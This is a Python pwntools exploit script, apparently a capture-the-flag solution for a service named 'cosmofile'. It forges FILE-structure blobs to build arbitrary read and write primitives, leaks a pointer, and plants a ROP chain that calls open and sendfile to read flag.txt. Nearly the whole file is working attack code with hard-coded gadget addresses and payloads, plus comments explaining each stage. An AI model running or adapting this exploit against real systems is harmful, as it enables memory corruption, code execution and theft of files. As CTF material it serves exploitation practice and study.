from pwn import *


#p = process('./cosmofile')
#p = remote('34.45.81.67', 16005)
# Connection to the challenge service; every helper below talks over this tube.
# Only the localhost instance is enabled here; the two lines above are the
# author's alternative targets (local process / remote instance).
TARGET_HOST = 'localhost'
TARGET_PORT = 5000
p = remote(TARGET_HOST, TARGET_PORT)
#gdb.attach(p)


def fread():
    """Select menu option 1 and return the file content the service prints.

    Waits for the ``>`` prompt, sends ``1``, skips everything up to and
    including ``Content of cosmofile:\\n`` and then returns exactly 0x1000
    raw bytes (``recvn`` blocks until that many bytes have arrived).
    """
    menu_read = b'1'
    p.sendlineafter(b'>', menu_read)
    p.recvuntil(b'Content of cosmofile:\n')
    content = p.recvn(0x1000)
    return content
def exet():
    """Select menu option 2 at the ``>`` prompt.

    Presumably the service's exit entry (inferred from the name only);
    nothing else in this file calls it.
    """
    menu_exit = b'2'
    p.sendlineafter(b'>', menu_exit)

def write_into_FILE(payload):
    """Enter menu value 7238770 and send *payload* raw after the service's banner.

    ``sendafter`` (not ``sendlineafter``) is used for the payload, so no
    trailing newline is appended; *payload* must already be the exact
    byte sequence the caller wants delivered.
    """
    menu_value = b'7238770'
    banner = b"that's not really a secret..."
    p.sendlineafter(b'>', menu_value)
    p.sendafter(banner, payload)

def arb_read(addr):
    """Return 0x1000 bytes that the service prints for *addr* (read primitive).

    As the name states, this is the script's arbitrary-read helper: a
    packed blob containing *addr* is delivered via write_into_FILE() and
    the result is collected with fread() (menu option 1). Apart from
    ``sz``/``beg``/``end`` and *addr*, every field of the blob is a
    fixed constant specific to this target build and is reproduced
    verbatim; the meaning of the individual fields is not documented
    in this file.

    Returns the raw 0x1000 bytes fread() receives.
    """
    sz = 0x1000
    beg = 0x0
    end = 0x1000
    # Field order: 3 qwords, then sz/beg/end/0 as dwords, then addr,
    # then the remaining fixed qwords. Only differs from arb_write() in the
    # second qword and the sz/end values.
    payload = p64(0x0000024200010100)+p64(0x0000000300000000)+p64(0x0000000000000000)+p32(sz)+p32(beg)+p32(end)+p32(0x0)+p64(addr)+p64(0x0)+p64(0x2)+p64(0x0)*3+p64(0x000000000042f338)+ p64(0x000000000042f3d8)+p64(0x0000000000000000)

    write_into_FILE(payload)
    return fread()

def arb_write(addr, data):
    """Deliver *data* so that it lands at *addr* in the target (write primitive).

    Same packed blob as arb_read() except for the second qword (zero here)
    and ``sz``=0x1001 / ``end``=0. After write_into_FILE(), menu option 1
    is selected and one buffer is sent: 0x1000 filler bytes, then *data*,
    then ``c`` padding so the total length is 0x1000+4085 bytes.
    Nothing is read back and nothing is returned.

    Caveat: if ``len(data)`` exceeds 4085 the padding count goes
    negative, ``b'c'*(negative)`` is ``b''``, and the buffer sent is
    longer than 0x1000+4085 bytes -- callers must keep *data* short.
    """
    sz = 0x1001
    beg = 0x0
    end = 0x0
    # Constants other than sz/beg/end/addr are target-build-specific and
    # copied verbatim; see arb_read() for the shared layout.
    payload = p64(0x0000024200010100)+p64(0x0000000000000000)+p64(0x0000000000000000)+p32(sz)+p32(beg)+p32(end)+p32(0x0)+p64(addr)+p64(0x0)+p64(0x2)+p64(0x0)*3+p64(0x000000000042f338)+ p64(0x000000000042f3d8)+p64(0x0000000000000000)

    write_into_FILE(payload)

    # Menu option 1 again, but this time the service is fed a buffer
    # instead of being read from.
    p.sendlineafter(b'>', b'1')
    pay = b'a'*(0x1000) + data 
    # Pad to a fixed total length (see caveat in the docstring).
    pay = pay + b'c'*(0x1000+4085-len(pay))
    p.send(pay) 


# Stage 1: leak one qword from the fixed address 0x438098 (first 8 bytes of
# the 0x1000-byte read). The variable name suggests it is the argv pointer;
# that is not verifiable from this file.
argv = u64(arb_read(0x438098)[:8]) 
# Destination for the chain below: a fixed offset below the leaked pointer.
ret = argv - 0x1040

# ROP gadget addresses. All of them are hard-coded for this specific target
# build (no PIE, no leak-based rebasing) and will not transfer to any other
# binary, including a recompiled one.
poprdi_rbp = p64(0x00000000004010b7)
poprsi_rbp = p64(0x0000000000401e1b)
movrdirsi = p64(0x0000000000411dfc) #0x0000000000411dfc : mov qword ptr [rdi], rsi ; ret
movrdxrdi = p64(0x00000000004231fa) #0x00000000004231fa : mov rdx, rdi ; ret
poprax = p64(0x000000000040bdf5) # 0x000000000040bdf5 : pop rax ; ret

syscall = p64(0x4111fa)
poprdirsirbp = p64(0x000000000040401d ) # 0x000000000040401d : pop rsi ; pop rdi ; pop rbp ; ret

# Writable address that receives the string stored by the chain.
flagstr = p64(0x42f690)

# The chain. 0x7478742e67616c66 is b'flag.txt' in little-endian; the first
# two mov-[rdi],rsi stores place a zero qword at 0x42f698 and that string at
# flagstr. The rax values 0x2 and 0x28 are the x86-64 Linux syscall numbers
# for open and sendfile. The gadgets at 0x401a5f and 0x41710e carry no
# annotation in this file -- what they do has to be checked in the target.
# poprdi_rbp and movrdxrdi are defined above but not used in this chain.
payload = poprdirsirbp + p64(0x0)+p64(0x42f698)+p64(0x0)+movrdirsi+poprdirsirbp + p64(0x7478742e67616c66)+flagstr +p64(0x0)+movrdirsi + poprsi_rbp + p64(0x0)*2+poprax + p64(0x2)+syscall+poprdirsirbp + p64(0x4)+p64(0x1)+p64(0x0)+poprax + p64(0x28)+p64(0x0000000000401a5f)+p64(0x000000000041710e)+syscall

# Stage 2: place the chain at the computed location (see arb_write() for
# the length limit on the data argument).
arb_write(ret, payload)

log.info('argv: '+hex(argv))
# Hand the connection to the operator.
p.interactive()
